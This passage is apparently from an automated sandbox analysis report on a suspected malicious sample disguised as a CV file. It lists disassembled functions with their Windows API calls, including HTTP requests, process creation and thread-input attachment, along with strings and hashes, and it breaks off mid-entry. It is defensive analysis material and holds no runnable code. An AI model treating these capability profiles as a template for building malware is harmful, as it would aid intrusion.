GetLastError.KERNEL32 ref: 0033E416
SetErrorMode.KERNEL32(00000000,READY), ref: 0033E483

Strings

READONLY, xrefs: 0033E44E
READY, xrefs: 0033E45C
NOTREADY, xrefs: 0033E442
UNKNOWN, xrefs: 0033E43B
INVALID, xrefs: 0033E455

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Error$Mode$DiskFreeLastSpace
String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
API String ID: 4194297153-14809454
Opcode ID: fccbd1efe8a2a1725e3157de2991ec51c4a64a360f3d26fd9bfeca3e1e8d64bf
Instruction ID: faa769bf9913d696f9e51c6cba7582aed2f825bacfe53f0e2c5452b5e1c45194
Opcode Fuzzy Hash: fccbd1efe8a2a1725e3157de2991ec51c4a64a360f3d26fd9bfeca3e1e8d64bf
Instruction Fuzzy Hash: 8731B235A00209AFDB02EB65CD85ABEB7B8EF09300F148025F506AB2D1DB70AA41CB51

Function 0032B907 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0032B98C
GetDlgCtrlID.USER32 ref: 0032B997
GetParent.USER32 ref: 0032B9B3
SendMessageW.USER32(00000000,?,00000111,?), ref: 0032B9B6
GetDlgCtrlID.USER32(?), ref: 0032B9BF
GetParent.USER32(?), ref: 0032B9DB
SendMessageW.USER32(00000000,?,?,00000111), ref: 0032B9DE

Strings

ComboBox, xrefs: 0032B911
ListBox, xrefs: 0032B949

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: f3f75272226fef9d8767d063fe2340012209fa0a009b410eb19db05382126e25
Instruction ID: 2b2460adc101009f5491f707c52741480aec9c784cfcec0be3f7f6d72775ff08
Opcode Fuzzy Hash: f3f75272226fef9d8767d063fe2340012209fa0a009b410eb19db05382126e25
Instruction Fuzzy Hash: 4D21F574900108BFDB06ABA4DC86EFEBB78EF4A310F50011AF655A72E1DB745865DF60

Function 0032B9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0032BA73
GetDlgCtrlID.USER32 ref: 0032BA7E
GetParent.USER32 ref: 0032BA9A
SendMessageW.USER32(00000000,?,00000111,?), ref: 0032BA9D
GetDlgCtrlID.USER32(?), ref: 0032BAA6
GetParent.USER32(?), ref: 0032BAC2
SendMessageW.USER32(00000000,?,?,00000111), ref: 0032BAC5

Strings

ComboBox, xrefs: 0032B9FA
ListBox, xrefs: 0032BA32

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: ComboBox$ListBox
API String ID: 1383977212-1403004172
Opcode ID: be79d888cdaee692e67c61aa17734a82e10196f7b3de3f4ecda67b947be19a47
Instruction ID: 0ba8fb26521f49d2f0b7d1c99e684b4baa1f01ab16d0512b88f06114ff23edbe
Opcode Fuzzy Hash: be79d888cdaee692e67c61aa17734a82e10196f7b3de3f4ecda67b947be19a47
Instruction Fuzzy Hash: 6221F2B4A00108BFDB02ABA4DC85EFEBB78EF49300F100019F551A7291DBB5486A9F20

Function 0032BAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 0032BAE3
GetClassNameW.USER32(00000000,?,00000100), ref: 0032BAF8
_wcscmp.LIBCMT ref: 0032BB0A
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0032BB85

Strings

details, xrefs: 0032BB33
smallicons, xrefs: 0032BB4D
list, xrefs: 0032BB67
largeicons, xrefs: 0032BB19
SHELLDLL_DefView, xrefs: 0032BB04

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ClassMessageNameParentSend_wcscmp
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1704125052-3381328864
Opcode ID: ad73fde1a6fe6765f226d1bdb43c37bd87d9007c3de42b24a6a2041ba048d611
Instruction ID: 95a1ede1d645f64d4922197b5da3e22045ef71f79a0eb752e310ce194c575f1e
Opcode Fuzzy Hash: ad73fde1a6fe6765f226d1bdb43c37bd87d9007c3de42b24a6a2041ba048d611
Instruction Fuzzy Hash: 90110676608313FAFA2B6624FC0BDE7B7ACDF16720F200022F909E40D5EFA1A8915514

Function 0034B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0034B2D5
CoInitialize.OLE32(00000000), ref: 0034B302
CoUninitialize.OLE32 ref: 0034B30C
GetRunningObjectTable.OLE32(00000000,?), ref: 0034B40C
SetErrorMode.KERNEL32(00000001,00000029), ref: 0034B539
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0034B56D
CoGetObject.OLE32(?,00000000,0037D91C,?), ref: 0034B590
SetErrorMode.KERNEL32(00000000), ref: 0034B5A3
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0034B623
VariantClear.OLEAUT32(0037D91C), ref: 0034B633

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
String ID:
API String ID: 2395222682-0
Opcode ID: b90be9e6c899549c1d522d33308c4cbd9477b0ee6999d121fa0c7e8ab826b564
Instruction ID: 01f9f3a82d1bd9421c09c4d87d093dcbf067d2b84c3dfd8410ebd7cf210ead8a
Opcode Fuzzy Hash: b90be9e6c899549c1d522d33308c4cbd9477b0ee6999d121fa0c7e8ab826b564
Instruction Fuzzy Hash: 75C11171608305AFC701DF69C884A2BF7E9BF89348F00496DF98A9B251DB71ED05CB52

Function 0031ACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON

Download Yara Rule

APIs

__lock.LIBCMT ref: 0031ACC1

Part of subcall function 00317CF4: __mtinitlocknum.LIBCMT ref: 00317D06
Part of subcall function 00317CF4: EnterCriticalSection.KERNEL32(00000000,?,00317ADD,0000000D), ref: 00317D1F

__calloc_crt.LIBCMT ref: 0031ACD2

Part of subcall function 00316986: __calloc_impl.LIBCMT ref: 00316995
Part of subcall function 00316986: Sleep.KERNEL32(00000000,000003BC,0030F507,?,0000000E), ref: 003169AC

@_EH4_CallFilterFunc@8.LIBCMT ref: 0031ACED
GetStartupInfoW.KERNEL32(?,003A6E28,00000064,00315E91,003A6C70,00000014), ref: 0031AD46
__calloc_crt.LIBCMT ref: 0031AD91
GetFileType.KERNEL32(00000001), ref: 0031ADD8
InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 0031AE11

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
String ID:
API String ID: 1426640281-0
Opcode ID: 5439e3d3b81b3ab96d8d5ad7d74c1d004497d7d4f13cf5ee7293959656bbf5cb
Instruction ID: ac732858ba644833de8aae0018df4f57b78326b85249a21ba9c53ad6fb45250c
Opcode Fuzzy Hash: 5439e3d3b81b3ab96d8d5ad7d74c1d004497d7d4f13cf5ee7293959656bbf5cb
Instruction Fuzzy Hash: A081B271906A458FDB2ACF68C8405EEBBF4AF4D325B24435DD4A6AB3D1C7349883CB51

Function 00334025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 00334047
GetForegroundWindow.USER32(00000000,?,?,?,?,?,003330A5,?,00000001), ref: 0033405B
GetWindowThreadProcessId.USER32(00000000), ref: 00334062
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003330A5,?,00000001), ref: 00334071
GetWindowThreadProcessId.USER32(?,00000000), ref: 00334083
AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003330A5,?,00000001), ref: 0033409C
AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003330A5,?,00000001), ref: 003340AE
AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003330A5,?,00000001), ref: 003340F3
AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003330A5,?,00000001), ref: 00334108
AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003330A5,?,00000001), ref: 00334113

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Thread$AttachInput$Window$Process$CurrentForeground
String ID:
API String ID: 2156557900-0
Opcode ID: 3ffa93a0160ff6e17b9ca23f7d3384f50d95132f45339fb2cea9fe2c10fc0b08
Instruction ID: 92f3e96cfd198cda40db3e889863e55e21dab1e6507dad7dbec082c89aa72dec
Opcode Fuzzy Hash: 3ffa93a0160ff6e17b9ca23f7d3384f50d95132f45339fb2cea9fe2c10fc0b08
Instruction Fuzzy Hash: 9E319171A00624AFDB23DF94DC85B697BBDFF54315F118115FA08E62A4DBB4EA80CB60

Function 0036DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 0030B496
SetTextColor.GDI32(?,000000FF), ref: 0030B4A0
SetBkMode.GDI32(?,00000001), ref: 0030B4B5
GetStockObject.GDI32(00000005), ref: 0030B4BD
GetClientRect.USER32(?), ref: 0036DD63
SendMessageW.USER32(?,00001328,00000000,?), ref: 0036DD7A
GetWindowDC.USER32(?), ref: 0036DD86
GetPixel.GDI32(00000000,?,?), ref: 0036DD95
ReleaseDC.USER32(?,00000000), ref: 0036DDA7
GetSysColor.USER32(00000005), ref: 0036DDC5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
String ID:
API String ID: 3430376129-0
Opcode ID: 8f2e9de437a46b1ec2cdeb7fd80d467ffa74cb617ef3b7a44dc3bde2ec6ab84e
Instruction ID: 99e92c2b4885ce40e5896c7dbea0bcde34e8444095e8261afafaae51566ad05d
Opcode Fuzzy Hash: 8f2e9de437a46b1ec2cdeb7fd80d467ffa74cb617ef3b7a44dc3bde2ec6ab84e
Instruction Fuzzy Hash: 10115E31500205EFDB636FB4EC08BA97B79EF05335F518625FA6AA50E1CB720A81DF20

Function 002F3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 002F30DC
CoUninitialize.OLE32(?,00000000), ref: 002F3181
UnregisterHotKey.USER32(?), ref: 002F32A9
DestroyWindow.USER32(?), ref: 00365079
FreeLibrary.KERNEL32(?), ref: 003650F8
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00365125

Strings

close all, xrefs: 002F30D7

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: 8facf0d572447ce298e643d66c52bd1f2b35695c2a22b63089f142b05d194351
Instruction ID: 0b71e362d394495f3d342760029e088058bf3e8d5ef41b87734e6da630358dfb
Opcode Fuzzy Hash: 8facf0d572447ce298e643d66c52bd1f2b35695c2a22b63089f142b05d194351
Instruction Fuzzy Hash: 77912A3462110A8FC716EF14C895A79F3A8FF15344F5581B9E60AA7262DF30AE66CF50

Function 0030CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 0030CC15

Part of subcall function 0030CCCD: GetClientRect.USER32(?,?), ref: 0030CCF6
Part of subcall function 0030CCCD: GetWindowRect.USER32(?,?), ref: 0030CD37
Part of subcall function 0030CCCD: ScreenToClient.USER32(?,?), ref: 0030CD5F

GetDC.USER32 ref: 0036D137
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0036D14A
SelectObject.GDI32(00000000,00000000), ref: 0036D158
SelectObject.GDI32(00000000,00000000), ref: 0036D16D
ReleaseDC.USER32(?,00000000), ref: 0036D175
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0036D200

Strings

U, xrefs: 0036D0D5

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: 4c8b4a7100bbc6fe4ac91d90ec018629f45e08ea2b5856663573d20d5e0f0609
Instruction ID: aaebeb1e08581101dc8978cb16f0bf96e6df09fe84c6bbf6c54bee58ea34993a
Opcode Fuzzy Hash: 4c8b4a7100bbc6fe4ac91d90ec018629f45e08ea2b5856663573d20d5e0f0609
Instruction Fuzzy Hash: B571E330A00209DFCF23DF64CC91AAA7BB9FF49314F198669ED555A2AAD7318C81DF50

Function 003445C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003445FF
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0034462B
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0034466D
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00344682
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0034468F
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003446BF
InternetCloseHandle.WININET(00000000), ref: 00344706

Part of subcall function 00345052: GetLastError.KERNEL32(?,?,003443CC,00000000,00000000,00000001), ref: 00345067

Strings

, xrefs: 003446B8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
String ID:
API String ID: 1241431887-3916222277
Opcode ID: b972490f1ce6525507b8cb299b93182335ed1043379c2c3930d521dc59f21722
Instruction ID: 9e1a24551e76a7ff8b2a8cb100fd090316cfd53dfeddfb78b8b78e175a9705ca
Opcode Fuzzy Hash: b972490f1ce6525507b8cb299b93182335ed1043379c2c3930d521dc59f21722
Instruction Fuzzy Hash: 57417BB1501209BFEB179F50CC89FBA7BECEF09354F11402AFA059E181DBB4A9448BA4

Function 0034B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,0038DC00), ref: 0034B715
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0038DC00), ref: 0034B749
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0034B8C1
SysFreeString.OLEAUT32(?), ref: 0034B8EB

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: 7eb86e58c40a484dba3da1f7d93d1eab6f3cb0e31d67e229084552091495148d
Instruction ID: ca3e1ecdc9a70f5abf82434008bc0e59497b2d2bbeac2d068d9de9150d0f8d20
Opcode Fuzzy Hash: 7eb86e58c40a484dba3da1f7d93d1eab6f3cb0e31d67e229084552091495148d
Instruction Fuzzy Hash: 06F11775A00209EFCB15DF94C884EAEB7B9FF49315F118499F905AB250DB31EE46CB90

Function 003524D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 003524F5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00352688
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003526AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003526EC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0035270E
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0035286F
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 003528A1
CloseHandle.KERNEL32(?), ref: 003528D0
CloseHandle.KERNEL32(?), ref: 00352947

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: db6839d32b7c8216e59aa96a22fec6d2d8854a54d10244a1d9d82508ac249401
Instruction ID: 553b2865f36920f07f66a8d20ff6f2564e2b0fc89856a2d84e901aca2e5cd2e1
Opcode Fuzzy Hash: db6839d32b7c8216e59aa96a22fec6d2d8854a54d10244a1d9d82508ac249401
Instruction Fuzzy Hash: 70D1A031604200DFC716EF24C891E6ABBE5AF86310F19896DF9999F2A2DB31DC45CF52

Function 0035B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0035B3F4

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 5eb5ea54360b0e1c2885326e1ed1f39c639a4c767f03666d0823476d099dfae4
Instruction ID: 2cecd870ba1eab08597ce09b89e4de3b051f608e56bee935b252d68bd404ba44
Opcode Fuzzy Hash: 5eb5ea54360b0e1c2885326e1ed1f39c639a4c767f03666d0823476d099dfae4
Instruction Fuzzy Hash: EB51BF74501204BBEF379F29CC85FADBB68AB05326F644411FE14EA6F2D771E9888B50

Function 0030A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0036DB1B
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0036DB3C
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0036DB51
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0036DB6E
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0036DB95
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0030A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0036DBA0
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0036DBBD
DestroyIcon.USER32(00000000,?,?,?,?,?,?,0030A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0036DBC8

Memory Dump Source

Source File: 00000000.00000002.1769248228.00000000002F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true

Associated: 00000000.00000002.1769230278.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000037D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769291853.000000000039E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769332301.00000000003AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1769349456.00000000003B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f0000_CV_ Filipa Barbosa.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: b25eee3dade0737c5fa9bd5092739d9ad856e5479e5844d74b29e1271b8d2d7c
Instruction ID: 0d59251b03d3d91ee5b8a3bb055577dcb22f3d282453958dee089b3ce39cb887
Opcode Fuzzy Hash: b25eee3dade0737c5fa9bd5092739d9ad856e5479e5844d74b29e1271b8d2d7c
Instruction Fuzzy Hash: 36517A70A01708EFDB22DF68DCA1FAA77B8AF48754F114618F9069B6D0D7B0AD80DB50

Function 00337555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON

Download Yara Rule

APIs

